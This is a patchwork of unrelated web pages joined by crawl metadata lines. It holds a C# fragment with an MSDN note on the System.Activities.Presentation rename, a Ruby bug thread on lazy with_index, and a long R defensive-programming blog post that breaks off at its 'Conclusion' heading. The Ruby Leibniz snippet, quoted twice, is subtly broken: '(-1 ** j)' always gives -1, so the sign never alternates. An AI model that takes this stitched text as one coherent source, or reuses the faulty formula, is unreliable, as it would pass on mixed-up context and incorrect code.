FavoriteAnimals.Add(mi);
else
{
FavoriteAnimals.Remove(mi);
}
})
};
aps.AddProperty(isFavoriteAnimal);
dog.IsFavoriteAnimal = true;
// remove that cat that isn't there
cat.IsFavoriteAnimal = false;
cat.IsFavoriteAnimal = true;
cat.IsFavoriteAnimal = false;
Console.WriteLine("Who are my favorite animals?");
FavoriteAnimals.ForEach(o => Console.WriteLine((o as ModelItem).Properties["Name"].ComputedValue.ToString()));
Console.ReadLine();
}
}
public class Dog
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
public class Cat
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
}.
I got an email over the weekend asking about this, and I realized that it's somewhat buried in this post here. Anyway, in Beta1, you often saw System.Activities.Design. For Beta2 (and RTM), one important change was made: those namespaces are now System.Activities.Presentation.
The primary reason for this change is that the *.Design suffix is generally reserved for VS design extensibility. As our designer ships in the framework, *.Design was not the correct suffix. *.Presentation is where we landed.
Hoping that putting this in the title lands this high up in search queries so that this post might be useful for a few people.
|
https://blogs.msdn.com/b/mwinkle/default.aspx?Redirected=true&PostSortBy=MostRecent&PageIndex=1
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Bug #7877
E::Lazy#with_index should be lazy
Description
=begin
So I wanted some real benefit of being lazy. I wrote a Leibniz formula:
def leibniz(n)
(0..Float::INFINITY).lazy.with_index {|i, j| (-1 ** j) / (2*i+1).to_f }.take(n).reduce(:+)
end
But it doesn't work (well, it does, indeed. It just doesn't stop working). I got frustrated.
How about it? Don't you feel it nifty?
Of course I can wait for the release next to 2.0.0.
=end
History
#1
Updated by Nobuyoshi Nakada about 1 year ago
- File 0001-enumerator.c-Enumerator-Lazy-with_index.patch
added
- Description updated (diff)
#2
Updated by Marc-Andre Lafortune about 1 year ago
#3
Updated by Shyouhei Urabe about 1 year ago
OK, so @marcandre is interested in this. I re-wrote the description in English.
#4
Updated by Marc-Andre Lafortune about 1 year ago
Note that (thanks to #7715), you can use
with_index without a block and follow it with
map:
def leibniz(n)
  (0..Float::INFINITY).lazy.with_index.map {|i, j| (-1 ** j) / (2*i+1).to_f }.take(n).reduce(:+)
end
I'm neutral about this feature request. The problem I see is that it's too late for 2.0.0 and it would introduce potential incompatibility in next minor.
#5
Updated by Shyouhei Urabe about 1 year ago
@marcandre oh, thank you! You saved my day.
Still I want this though.
#6
Updated by Zachary Scott 11 months ago
Propose to move this to next major?
#7
Updated by Martin Dürst 11 months ago
zzak (Zachary Scott) wrote:
Propose to move this to next major?
Do you mean because of "potential incompatibility" ()? What exactly would this incompatibility be? To me, it seems that lazy.with_index would just work, so we should just fix it. Next major seems way too long to wait.
#8
Updated by Zachary Scott 9 months ago
@duerst You're probably right, since this feature was introduced in 2.0.0
If yhara-san wants to implement #with_index with a block then I see no problem with introducing this in 2.1.0
#9
Updated by Zachary Scott 9 months ago
- Tracker changed from Feature to Bug
- Subject changed from E::Lazy#with_index needed to E::Lazy#with_index should be lazy
- Target version changed from next minor to 2.1.0
- ruby -v set to 2.1.0-dev
- Backport set to 2.0.0: UNKNOWN
#10
Updated by Hiroshi SHIBATA about 1 month ago
- Target version changed from 2.1.0 to current: 2.2.0
Also available in: Atom PDF
|
https://bugs.ruby-lang.org/issues/7877
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
- Overview
- Schema
- Schema top-level elements
- <sys:environment>
- <context-root>
- <work-dir>
- <naming:web-container>
- <container-config>
- <sys:gbean>
- <ee:persistence>
- Security
- JNDI Environment References
Overview
The Geronimo-specific deployment plan for a Web application, which is usually packaged as a WAR file, is called "geronimo-web.xml". The geronimo-web.xml deployment plan is used in conjunction with the web.xml Java EE deployment plan.
Packaging
The geronimo-web.xml Geronimo-specific deployment plan can be packaged as follows:
- Embedded in a WAR file. In this case, the geronimo-web.xml file must be placed in the /WEB-INF directory of the WAR, which is the same place where the web.xml file must be located.
- Maintained separately from the WAR file: In this case, the path to the file must be provided to the appropriate Geronimo deployer (e.g., command-line or console) when the WAR file is deployed. Note that in this case, the file may be named something other than geronimo-web.xml but must adhere to the same schema. Also note that this will not work if the WAR file is to be embedded in an enterprise application EAR file (see below).
- Embedded in an enterprise application EAR file: In one case, the root-level element <web-app> of the geronimo-web-2.0.1.xsd schema can be embedded outside the WAR file in the EAR file's geronimo-application.xml file.
- Embedded in an enterprise application EAR file: In another case, the actual geronimo-web.xml file can be placed in the /META-INF directory of the EAR, which is the same location as the application.xml file.
Schema.
Schema top-level elements:
<sys:environment>
The <sys:environment> XML element uses the Geronimo System namespace, which is used to specify the common elements for common libraries and module-scoped services; it is documented separately and is not specific to web applications.
An example geronimo-web.xml file is shown below using the <sys:environment> element:
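Below is a minimal, hedged sketch of such a plan; the namespace URIs, moduleId values and context root are illustrative and should be checked against the geronimo-web-2.0.1.xsd schema for your server version:

<web-app xmlns="http://geronimo.apache.org/xml/ns/j2ee/web-2.0.1"
         xmlns:sys="http://geronimo.apache.org/xml/ns/deployment-1.2">
  <sys:environment>
    <sys:moduleId>
      <sys:groupId>com.example</sys:groupId>
      <sys:artifactId>sample-webapp</sys:artifactId>
      <sys:version>1.0</sys:version>
      <sys:type>war</sys:type>
    </sys:moduleId>
  </sys:environment>
  <context-root>/sample</context-root>
</web-app>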
<context-root>.
<work-dir>.
<naming:web-container>:
<container-config>:
<sys:gbean>.
<ee:persistence>: Java Persistence API deployment plans.
Security
Additional information and details for configuring security for Geronimo can be found here:
<security-realm-name> Security for details on how this is typically accomplished from the Geronimo Admin Console.
<sec:security>
The <sec:security> XML element uses the Geronimo Security namespace, and is documented here:
The <sec:
An example geronimo-web.xml file is shown below using the <abstract-naming-entry> element to reference a persistence unit:
.
|
https://cwiki.apache.org/confluence/display/GMOxDOC21/geronimo-web.xml
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
>>>>> "AW" ==. Drafts are discussed by the packaging committee and may, after ratification by FESCo, be written into the packaging guidelines. All of the packaging guidelines exist in the Packaging namespace on the wiki. Any other page in the wiki may be the policy of some other SIG or committee, but is not an official Fedora packaging guideline. That isn't to say that such pages aren't useful. They provide useful points for discussion. There's simply no filter on them to ensure that they are balanced, reasonable or remotely sane.. - J<
|
http://www.redhat.com/archives/epel-devel-list/2009-February/msg00075.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
C# Programming > Miscellaneous
Hearing the word "MS-Queue" for the first time might remind you of a queue data structure (like the one found in the System.Collections namespace). Although the concept is pretty close, MS-Queue is something entirely different.
The MS-Queue is a Windows component that offers an interesting mechanism to facilitate the exchange of data between software applications in the same computer or network (i.e. different sessions). The MS-Queue works as a FIFO queue at the operating system level. The data exchanged through the queue can be anything: text, images, serialized objects, etc.
Why would we need this? Picture a scenario where a system receives customer orders from an outside source at a faster rate than the system can process them. The MS-Queue would be ideal in this case since it would receive and store the orders while the application in charge of processing them simply requests the next order from the MS-Queue.
In this case, one application (i.e. service) would be in charge of receiving the orders and putting them in a Queue. A second application would be in charge of taking them out of the Queue and processing them.
Although the MS-Queue is part of most Windows operating systems components, it is usually not installed as part of the default installation. So before continuing you might have to install it.
Once installed, the developer can take advantage of it. Here is a screen shot that depicts the idea of installing the component by enabling it in the Windows component installation screen. (The process is similar for Windows XP, Windows Vista, Windows 7 and Windows Server; on Windows 2000 and NT it is an optional component that requires a separate installation.)
Now, through the Computer Management (Control Panel -> Administrative Tools) the queue can be observed. The following screen shot shows what you might see:
There are Public and Private Queues. It is common for developers to use the private queues folder. The developer has the option to create a Queue manually or programmatically. The created Queue will have a name that will be used in the code.
There are alternative queue viewer programs that can provide more information than the Computer Management tool. For example, one tool is MSMQ Studio by Geek Project (); it is free and works really well.
It is up to you whether you want these more advanced tools. For the purposes of this article, the default Windows tool will be sufficient.
We are almost ready to use the MS-Queue in our .NET applications. One last step is to allow the C# program to access the System.Messaging namespace. This is not a default reference! You have to go under Project > Add Reference and find it under the .NET tab. Once you have that, you are ready to use the MS-Queue in your C# applications.
Within the code, the way to reference a queue will be through its name and folder location in the Message Queue (this is known as the Queue path), for example,
string myQueuePath = @".\private$\myQueue";
It is simple to create a Queue, the example is as follows:
public static void CreateQueue(string queuePath)
{
    try
    {
        if (!MessageQueue.Exists(queuePath))
        {
            MessageQueue.Create(queuePath);
        }
        else
        {
            Console.WriteLine(queuePath + " already exists.");
        }
    }
    catch (MessageQueueException e)
    {
        Console.WriteLine(e.Message);
    }
}
Once the queue is created, the next step is to put data by means of a message. The following example is a method that will put a new message (an image in this case) into the queue:
public void SendMessage(string _queue, string _ImagePath)
{
    try
    {
        // prepare image for the Queue
        Image myImage = Bitmap.FromFile(_ImagePath);

        // Connect to a queue on the local computer.
        MessageQueue myQueue = new MessageQueue(_queue);

        // Prepare message
        Message myMessage = new Message();
        myMessage.Body = myImage;
        myMessage.Formatter = new BinaryMessageFormatter();

        // Send the message into the queue.
        myQueue.Send(myMessage);
    }
    catch (ArgumentException e)
    {
        Console.WriteLine(e.Message);
    }
    return;
}
The data can be retrieved by indicating the Queue itself what type of message is coming out. The following code depicts the idea:
public void ReceiveMessage(string _Queue, string _Image)
{
    try
    {
        // Connect to a queue on the local computer.
        MessageQueue myQueue = new MessageQueue(_Queue);

        // Set the formatter to indicate the body contains a binary object
        myQueue.Formatter = new BinaryMessageFormatter();

        // Receive and format the message.
        Message myMessage = myQueue.Receive();
        Bitmap myImage = (Bitmap)myMessage.Body;

        // Save received image
        myImage.Save(_Image, System.Drawing.Imaging.ImageFormat.Bmp);
    }
    catch (MessageQueueException)
    {
        // Handle Message Queuing exceptions.
    }
    catch (InvalidOperationException e)
    {
        // Handle invalid serialization format.
        Console.WriteLine(e.Message);
    }
    catch (IOException)
    {
        // Handle file access exceptions.
    }
    // Catch other exceptions as necessary.
    return;
}
The developer can assign the object to store to the message's Body, and the message's Formatter determines how to serialize it before the message is stored in the queue. The serialized contents are found in the BodyStream property.
An alternative approach is to assign an already-serialized object directly to the message's BodyStream.
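As a hedged sketch of that alternative (the Order class and the queue path are illustrative; this assumes using System.IO, System.Messaging and System.Xml.Serialization):

public class Order
{
    public int Id { get; set; }
    public string Customer { get; set; }
}

public static void SendSerializedOrder(Order order)
{
    // Serialize the object ourselves and hand the raw stream to the message.
    MemoryStream stream = new MemoryStream();
    new XmlSerializer(typeof(Order)).Serialize(stream, order);
    stream.Position = 0;

    Message message = new Message();
    message.BodyStream = stream;
    message.Label = "Serialized order";

    // The receiving side reads message.BodyStream and deserializes it the same way.
    using (MessageQueue queue = new MessageQueue(@".\private$\myQueue"))
    {
        queue.Send(message);
    }
}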
Now, one class worth looking at is the MessageQueueTransaction class, which, like any other transaction mechanism, offers all-or-nothing data storage.
For example, consider the case where you want to store an object that implements a particular interface:
private static void SendToOutputQueue(IMyMessage _MyMsg)
{
    MemoryStream ms = null;
    try
    {
        ms = new MemoryStream();
        XmlSerializer xs = new XmlSerializer(typeof(IMyMessage));
        xs.Serialize(ms, _MyMsg);

        Message outMsg = new Message();
        outMsg.Formatter = new ActiveXMessageFormatter();
        outMsg.Label = "Object ID 123456";
        outMsg.BodyStream = ms;

        // handle resources lifespan
        using (MessageQueueTransaction trans = new MessageQueueTransaction())
        {
            trans.Begin();

            // send message to output queue
            string outPath = @".\private$\myQueue";
            MessageQueue outQueue = new MessageQueue(outPath);
            outQueue.Send(outMsg, trans);

            trans.Commit();
        }

        outMsg.Dispose();
    }
    catch (Exception)
    {
        // handle exceptions or rethrow
        throw;
    }
    finally
    {
        if (ms != null)
        {
            ms.Close();
            ms.Dispose();
        }
    }
}
The MS-Queue offers many classes and much functionality to integrate with different application needs. It is a great resource, and it is worth stopping to look into some of the available information and adding it to your toolbox for the next great project.
For more information refer to the MSDN page:
|
http://www.vcskicks.com/ms-queue.php
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
The topic of defensive programming in R is, admittedly, a little unusual. R, while fun and powerful, is not going to run defibrillators, nuclear power plants or spacecraft. In fact, much – if not most! – R code is actually executed interactively, where small glitches don’t really matter. But where R code is integrated into a pipeline, runs autonomously or is embedded into a larger analytical solution, writing code that fails well is going to be crucial. So below, I have collected my top ten principles of defensive programming in R. I have done so with an eye to users who do not come from the life critical systems community and might not have encountered defensive programming before, so some of these rules apply to all languages.
What is defensive programming?
The idea of defensive programming is not to write code that never fails. That’s an impossible aspiration. Rather, the fundamental idea is to write code that fails well. To me, ‘failing well’ means five things:
- Fail fast: your code should ensure all criteria are met before they embark upon operations, especially if those are computationally expensive or might irreversibly affect data.
- Fail safe: where there is a failure, your code should ensure that it relinquishes all locks and does not acquire any new ones, not write files, and so on.
- Fail conspicuously: when something is broken, it should return a very clear error message, and give as much information as possible to help unbreak it.
- Fail appropriately: failure should have appropriate effects. For every developer, it’s a judgment call to ensure whether a particular issue would be a a debug/info item, a warning or an error (which by definition means halting execution). Failures should be handled appropriately.
- Fail creatively: not everything needs to be a failure. It is perfectly legitimate to handle problems. One example is repeating a HTTP request that has timed out: there’s no need to immediately error out, because quite frankly, that sort of stuff happens. Equally, it’s legitimate to look for a parameter, then check for a configuration file if none was provided, and finally try checking the arguments with which the code was invoked before raising an error.1
And so, without further ado, here are the ten ways I implement these in my day-to-day R coding practice – and I encourage you to do so yourself. You will thank yourself for it.
The Ten Commandments of Defensive Programming in R
- Document your code.
- In God we trust, everyone else we verify.
- Keep functions short and sweet.
- Refer to external functions explicitly.
- Don't use require() to import packages into the namespace.
- Aggressively manage package and version dependencies.
- Use a consistent style and automated code quality tools.
- Everything is a package.
- Power in names.
- Know the rules and their rationale, so that you know when to break them.
ONE: Document your code.
It’s a little surprising to even see this – I mean, shouldn’t you do this stuff anyway? Yes, you should, except some people think that because so much of R is done in the interpreter anyway, rules do not apply to them. Wrong! They very much do.
A few months ago, I saw some code written by a mentee of mine. It was infinitely long – over 250 standard lines! –, had half a dozen required arguments and did everything under the sun. This is, of course, as we’ll discuss later, a bad idea, but let’s put that aside. The problem is, I had no idea what the function was doing! After about half an hour of diligent row-by-row analysis, I figured it out, but that could have been half an hour spent doing something more enjoyable, such as a root canal without anaesthetic while listening to Nickelback. My friend could have saved me quite some hair-tearing by quite simply documenting his code. In R, the standard for documenting the code is called
roxygen2, it’s got a great parser that outputs the beautiful LaTeX docs you probably (hopefully!) have encountered when looking up a package’s documentation, and it’s described in quite a bit of detail by Hadley Wickham. What more could you wish for?
Oh. An example. Yeah, that'd be useful. We'll be documenting a fairly simple function, which calculates the Hamming distance between two strings of equal length, and throws something unpleasant in our face if they are not. Quick recap: the Hamming distance is the number of characters that do not match among two strings. Or mathematically put,

$d_H(s_1, s_2) = \sum_{i=1}^{\ell(s_1)} \delta(s_1[i], s_2[i])$

where $\ell$ is the length function and $\delta$ is the dissimilarity function, which returns 1 if two letters are not identical and 0 otherwise.
So, our function would look like this:
hamming <- function(s1, s2) {
  s1 <- strsplit(s1, "")[[1]]
  s2 <- strsplit(s2, "")[[1]]
  return(sum(s1 != s2))
}
Not bad, and pretty evident to a seasoned R user, but it would still be a good idea to point out a thing or two. One of these would be that the result of this code will be inaccurate (technically) if the two strings are of different lengths (we could, and will, test for that, but that’s for a later date). The Hamming distance is defined only for equal-length strings, and so it would be good if the user knew what they have to do – and what they’re going to get. Upon pressing Ctrl/Cmd+Shift+Alt+R, RStudio helpfully whips us up a nice little
roxygen2 skeleton:
#' Title
#'
#' @param s1
#' @param s2
#'
#' @return
#' @export
#'
#' @examples
hamming <- function(s1, s2) {
  s1 <- strsplit(s1, "")[[1]]
  s2 <- strsplit(s2, "")[[1]]
  return(sum(s1 != s2))
}
So, let’s populate it! Most of the fields are fairly self-explanatory.
roxygen2, unlike JavaDoc or RST-based Python documentation, does not require formal specification of types – it’s all free text. Also, since it will be parsed into LaTeX someday, you can go wild. A few things deserve mention.
- You can document multiple parameters. Since s1 and s2 are both going to be strings, you can simply write @param s1,s2 The strings to be compared.
- Use \code{...} to typeset something as fixed-width.
- To create links in the documentation, you can use \url{} to link to a URL, \code{\link{someotherfunction}} to refer to the function someotherfunction in the same package, and \code{\link[adifferentpackage]{someotherfunction}} to refer to the function someotherfunction in the adifferentpackage package. Where your function has necessary dependencies outside the current script or the base packages, it is prudent to note them here.
- You can use \seealso{} to refer to other links or other functions, in this package or another, worth checking out.
- Anything you put under the examples will be executed as part of testing and building the documentation. If your intention is to give an idea of what the code looks like in practice, and you don't want the result or even the side effects, you can surround your example with a \dontrun{...} environment.
- You can draw examples from a file. In this case, you use @example instead of @examples, and specify the path, relative to the file in which the documentation is, to the script: @example docs/examples/hamming.R would be such a directive.
- What's that @export thing at the end? Quite simply, it tells roxygen2 to export the function to the NAMESPACE file, making it accessible for reference by other documentation files (that's how, when you use \code{\link[somepackage]{thingamabob}}, roxygen2 knows which package to link to).
With that in mind, here’s what a decent documentation to our Hamming distance function would look like that would pass muster from a defensive programming perspective:
#' Hamming distance
#'
#' Calculates the Hamming distance between two strings of equal length.
#'
#' @param s1
#' @param s2
#'
#' @return The Hamming distance between the two strings \code{s1} and \code{s2}, provided as an integer.
#'
#' @section Warning:
#'
#' For a Hamming distance calculation, the input strings must be of equal length. This code does NOT reject input strings of different lengths.
#'
#' @examples
#' hamming("AAGAGTGTCGGCATACGTGTA", "AAGAGCGTCGGCATACGTGTA")
#'
#' @export
hamming <- function(s1, s2) {
  s1 <- strsplit(s1, "")[[1]]
  s2 <- strsplit(s2, "")[[1]]
  return(sum(s1 != s2))
}
This little example shows all that a good documentation does: it provides what to supply the function with and in what type, it provides what it will spit out and in what format, and adequately warns of what is not being checked. It’s always better to check input types, but warnings go a long way.2 From this file, R generates an
.Rd file, which is basically a LaTeX file that it can parse into various forms of documentation (see left.) In the end, it yields the documentation below, with the adequate warning – a win for defensive programming!
TWO: In God we trust, everyone else we verify.
In the above example, we have taken the user at face value: we assumed that his inputs will be of equal length, and we assumed they will be strings. But because this is a post on defensive programming, we are going to be suspicious, and not trust our user. So let’s make sure we fail early and check what the user supplies us with. In many programming languages, you would be using various assertions (e.g. the
assert keyword in Python), but all R has, as far as built-ins are concerned, is
stopifnot().
stopifnot() does as the name suggests: if the condition is not met, execution stops with an error message. However, on the whole, it's fairly clunky, and it most definitely should not be used to check for user inputs. For that, there are three tactics worth considering.
- assertthat is a package by Hadley Wickham (who else!), which implements a range of assert clauses. Most importantly, unlike stopifnot(), assertthat::assert_that() does a decent job at trying to interpret the error message. Consider our previous Hamming distance example: instead of gracelessly falling on its face, a test using assert_that(length(s1) == length(s2)) would politely inform us that s1 not equal to s2. That's worth it for the borderline Canadian politeness alone.
- Consider the severity of the user input failure. Can it be worked around? For instance, a function requiring an integer may, if it is given a float, try to coerce it to an integer. If you opt for this solution, make sure that you 1) always issue a warning, and 2) always allow the user to specify that the function should run in 'strict' mode (typically by setting the strict parameter to TRUE), which will raise a fatal error rather than try to logic its way out of this pickle.
- Finally, make sure that it's your code that fails, not the system code. Users should have relatively little insight into the internals of the system. And so, if at some point there'll be a division by an argument foo, you should test whether foo == 0 at the outset and inform the user that foo cannot be zero. By the time the division operation is performed, the variable might have been renamed baz, and the user will not get much actionable intelligence out of the fact that 'division by zero' has occurred at some point, and baz was the culprit. Just test early for known incompatibilities, and stop further execution. The same goes, of course, for potentially malicious code.
In general, your code should be strict as to what it accepts, and you should not be afraid to reject anything that doesn’t look like what you’re looking for. Consider for this not only types but also values, e.g. if the value provided for a timeout in minutes is somewhere north of the lifetime of the universe, you should politely reject such an argument – with a good explanation, of course.
Update: After posting this on Reddit, u/BillWeld pointed out a great idiom for checking user inputs that’s most definitely worth reposting here:
f <- function(a, b, c) {
  if (getOption("warn") > 0) {
    stopifnot(
      is.numeric(a),
      is.vector(a),
      length(a) == 1,
      is.finite(a),
      a > 0,
      is.character(b)
      # Other requirements go here
    )
  }
  # The main body of the function goes here
}
I find this a great and elegant idiom, although it is your call, as the programmer, to decide which deviations and what degree of incompatibility should cause the function to fail as opposed to merely emit a warning.
THREE: Keep functions short and sweet.
Rule #4 of the Power of Ten states
No function should be longer than what can be printed on a single sheet of paper in a standard reference format with one line per statement and one line per declaration. Typically, this means no more than about 60 lines of code per function.
Rationale: Each function should be a logical unit in the code that is understandable and verifiable as a unit. It is much harder to understand a logical unit that spans multiple screens on a computer display or multiple pages when printed. Excessively long functions are often a sign of poorly structured code.– Gerard J Holzmann, The Power of Ten – Rules for developing safety critical code
In practice, with larger screen sizes and higher resolutions, much more than a measly hundred lines fit on a single screen. However, since many users view R code in a quarter-screen window in RStudio, an appropriate figure would be about 60-80 lines. Note that this does not include comments and whitespaces, nor does it penalise indentation styles (functions, conditionals, etc.).
Functions should represent a logical unity. Therefore, if a function needs to be split for compliance with this rule, you should do so in a manner that creates logical units. Typically, one good way is to split functions by the object they act on.
FOUR: Refer to external functions explicitly.
In R, there are two ways to invoke a function, yet most people don’t tend to be aware of this. Even in many textbooks, the
library(package) function is treated as quintessentially analogous to, say,
import in Python. This is a fundamental misunderstanding.
In R, packages do not need to be imported in order to be able to invoke their functions, and that’s not what the
library() function does anyway.
library() attaches a package to the current namespace.
What does this mean? Consider the following example. The
foreign package is one of my favourite packages. In my day-to-day practice, I get data from all sorts of environments, and
foreign helps me import them. One of its functions,
read.epiinfo(), is particularly useful as it imports data from CDC’s free EpiInfo toolkit. Assuming that
foreign is in a library accessible to my instance of R,4, I can invoke the
read.epiinfo() function in two ways:
- I can directly invoke the function using its canonical name, of the form
package::function()– in this case,
foreign::read.epiinfo().
- Alternatively, I can attach the entire foreign package to the namespace of the current session using library(foreign). This has three effects, of which the first tends to be well-known, the second less so and the third altogether ignored.
- Functions in foreign will be directly available. Regardless of the fact that it came from a different package, you will be able to invoke it the same way you invoke, say, a function defined in the same script, by simply calling read.epiinfo().
- If there was a function of identical name to any function in foreign, that function will be 'shadowed', i.e. removed from the namespace. The namespace will always refer to the most recent function, and the older function will only be available by explicit invocation.
- When you invoke a function from the namespace, it will not be perfectly clear from a mere reading of the code what the function actually is, or where it comes from. Rather, the user or maintainer will have to guess what a given name will represent in the namespace at the time the code is running the particular line.
Controversially, my suggestion is
- to eschew the use of library() altogether, and
- to always invoke functions explicitly, apart from those that are in the namespace at startup.
This is not common advice, and many will disagree. That’s fine. Not all code needs to be safety-critical, and importing
ggplot2 with
library() for a simple plotting script is fine. But where you want code that’s easy to analyse, easy to read and can be reliably analysed as well, you want explicit invocations. Explicit invocations give you three main benefits:
- You will always know what code will be executed. filter may mean dplyr::filter, stats::filter, and so on, whereas specifically invoking dplyr::filter is unambiguous. You know what the code will be (simply invoking dplyr::filter without braces or arguments returns the source), and you know what that code is going to do.
- Your code will be more predictable. When someone – or something – analyses your code, they will not have to spend time guessing what a particular identifier refers to within the namespace at the time a given line runs.
- There is no risk that, as a 'side effect', various other functions you rely on will be shadowed in the namespace. In interactive coding, R usually warns you and lists all shadowed functions upon importing functions with the same name into the namespace using library(), but for code intended to be bulk executed, this issue has caused a lot of headache.
Obviously, all of this applies to
require() as well, although on the whole the latter should not be applied in general.
FIVE: Don’t use
require() to import a package into the namespace.
Even seasoned R users sometimes forget the difference between
library() and
require(). The difference is quite simple: while both functions attempt to attach the package argument to the namespace, require() returns FALSE if the import failed, while library() simply loads the package and raises an error if the import failed.
Just about the only legitimate use for
require() is writing an attach-or-install function. In any other case, as Yihui Xie points out,
require() is almost definitely the wrong function to use.
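For completeness, a minimal sketch of that attach-or-install idiom (the package name is just an example):

if (!require("ggplot2")) {
  install.packages("ggplot2")
  library("ggplot2")
}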
SIX: Aggressively manage package and version dependencies.
Packrat is one of those packages that have changed what R is like – for the better. Packrat gives every project a package library, akin to a private
/lib/ folder. This is not the place to document the sheer awesomeness of Packrat – you can do so yourself by doing the walkthrough of Packrat. But seriously, use it. Your coworkers will love you for it.
Equally important is to make sure that you specify the version of R that your code is written against. This is best accomplished on a higher level of configuration, however.
SEVEN: Use a consistent style and automated code quality tools.
This should be obvious – we’re programmers, which means we’re constitutionally lazy. If it can be solved by code faster than manually, then code it is! Two tools that help you with this are
lintr and
styler.
lintr is an amazingly widely supported (from RStudio through vim to Sublime Text 3, I hear a version for microwave ovens is in the works!) linter for R code. Linters improve code quality primarily by enforcing good coding practices rather than good style. One big perk of lintr is that it can be injected rather easily into the Travis CI workflow, which is a big deal for those who maintain multi-contributor projects and use Travis to keep the cats appropriately herded.
styler was initially designed to help code adhere to the Tidyverse Style Guide, which in my humble opinion is one of the best style guides that have ever existed for R. It can now take any custom style files and reformat your code, either as a function or straight from an RStudio add-in.
So use them.
EIGHT: Everything is a package.
Whether you’re writing R code for fun, profit, research or the creation of shareholder value, your coworkers and your clients – rightly! – expect a coherent piece of work product that has everything in one neat package, preferably version controlled. Sending around single R scripts might have been appropriate at some point in the mid-1990s, but it isn’t anymore. And so, your work product should always be structured like a package. As a minimum, this should include:
- A DESCRIPTION and NAMESPACE file.
- The source code, including comments.
- Where appropriate, data mappings and other ancillary data to implement the code. These go normally into the data/ folder. Where these are large, such as massive shape files, you might consider using Git LFS.
- Dependencies, preferably in a packrat repo.
- The documentation, helping users to understand the code and in particular, if the code is to be part of a pipeline, explaining how to interact with the API it exposes.
- Where the work product is an analysis rather than a bit of code intended to carry out a task, the analysis as vignettes.
To understand the notion of analyses as packages, two outstanding posts by Robert M. Flight are worth reading: part 1 explains the ‘why’ and part 2 explains the ‘how’. Robert’s work is getting a little long in the tooth, and packages like
knitr have taken the place of vignettes as analytical outputs, but the principles remain the same. Inasmuch as it is possible, an analysis in R should be a self-contained package, with all the dependencies and data either linked or included. From the perspective of the user, all that should be left for them to do is to execute the analysis.
NINE: Power in names.
There are only two hard things in Computer Science: cache invalidation and naming things.– Phil Karlton
In general, R has a fair few idiosyncrasies in naming things. For starters, dots/periods
. are perfectly permitted in variable names (and thus function names), when in most languages, the dot operator is a binary operator retrieving the first operand object’s method called the second operand:
For instance, in Python, wallet.pay(arg1, arg2) means ‘invoke the method pay of the object wallet with the arguments arg1 and arg2‘. In R, on the other hand, the dot is a character like any other, and therefore there is no special meaning attached to it – you can even have a variable containing multiple dots, or in fact a variable whose name consists entirely of dots – in R, .......... is a perfectly valid variable name. It is also a typical example of the fact that just because you can do something doesn’t mean you also should do so.
A few straightforward rules for variable names in R are worth abiding by:
- Above all, be consistent. That’s more important than whatever you choose.
- Some style guides, including Google’s R style guide, treat variables, functions and constants as different entities in respect of naming. This is, in my not-so-humble opinion, a blatant misunderstanding of the fact that functions are variables of the type
function, and not some distinct breed of animal. Therefore, I recommend using a unitary schema for all variables, callable or not.
- In order of my preference, the following are legitimate options for naming:
- Underscore separated:
average_speed
- Dot separated:
average.speed
- JavaScript style lower-case CamelCase:
averageSpeed
- Things that don’t belong into identifiers: hyphens, non-alphanumeric characters, emojis (🤦🏼♂️) and other horrors.
- Where identifiers are hierarchical, it is better to start representing them as hierarchical objects rather than assigning them to different variables. For example, instead of monthly_forecast_january, monthly_forecast_february and so on, it is better to have a list (an associative array) called forecasts in which the forecasts are keyed by month name, and can then be retrieved using the $key or the [key] accessors (a short sketch follows below). If your naming has half a dozen components, maybe it’s time to think about structuring your data better.
Finally, in some cases, the same data may be represented by multiple formats – for instance, data about productivity is first imported as a text file, and then converted into a data frame. In such cases, Hungarian notation may be legitimate, e.g.
txt_productivity or
productivity.txt vs
df_productivity or
productivity.df. This is more or less the only case in which Hungarian notation is appropriate.
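As a short sketch of the list-based approach mentioned above (the values are just placeholders):

forecasts <- list(
  january  = c(3.2, 3.4, 3.1),
  february = c(2.9, 3.0, 3.3)
)

forecasts$january         # access by name with $
forecasts[["february"]]   # access by key with [[ ]]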
And while we’re at variables: never, ever, ever use
= to assign. Every time you do it, a kitten dies of sadness.
For file naming, some sensible rules have served me well, and will be hopefully equally useful for you:
- File names should be descriptive, but no longer than 63 characters.
- File names should be all lower case, separated by underscores, and end in
.R. That’s a capital R. Not a lower-case R. EveR.
- Where there is a ‘head’ script that sequentially invokes (sources) a number of subsidiary scripts, it is common for the head script to be called
00-.R, and the rest given a sequential number corresponding to the order in which they are sourced and a descriptive name, e.g. 01-load_data_from_db.R, 02-transform_data_and_anonymise_records.R and so on.
- Where there is a core script, but it does not invoke other files sequentially, it is common for the core script to be called
00-base.R or main.R. As long as it’s somewhere made clear to the user which file to execute, all is fair.
- The injunction against emojis and other nonsense holds for file names, too.
TEN: Know the rules and their rationale, so that you know when to break them.
It’s important to understand why style rules and defensive programming principles exist. How else would we know which rules we can break, and when?
The reality is that there are no rules, in any field, that do not ever permit of exceptions. And defensive programming rules are no exception. Rules are tools that help us get our work done better and more reliably, not some abstract holy scripture. With that in mind, when can you ignore these rules?
- You can, of course, always ignore these rules if you’re working on your own, and most of your work is interactive. You’re going to screw yourself over, but that’s your right and privilege.
- Adhering to common standards is more important than doing what some dude on the internet (i.e. my good self) thinks is good R coding practice. Coherence and consistency are crucial, and you’ll have to stick to your team’s style over your own ideas. You can propose to change those rules, you can suggest that they be altogether redrafted, and link them to this page. But don’t go out and start following a style of your own just because you think it’s better (even if you’re right).
- It’s always a good idea to appoint a suitable individual – with lots of experience and little ego, ideally! – as code quality standards coordinator (CQSC). They will then centrally coordinate adherence to standards, train on defensive coding practices, review operational adherence, manage tools and configurations and onboard new people.
- Equally, having an ‘editor settings repo’ is pretty useful. This should support, at the very least, RStudio, lintr and styler.
- Some prefer to have the style guide as a GitHub or Confluence wiki – I generally advise against that, as that cannot be tracked and versioned as well as, say, a bunch of RST files that are collated together using Sphinx, or some RMarkdown files that are rendered automatically upon update using a GitHub webhook.
Conclusion
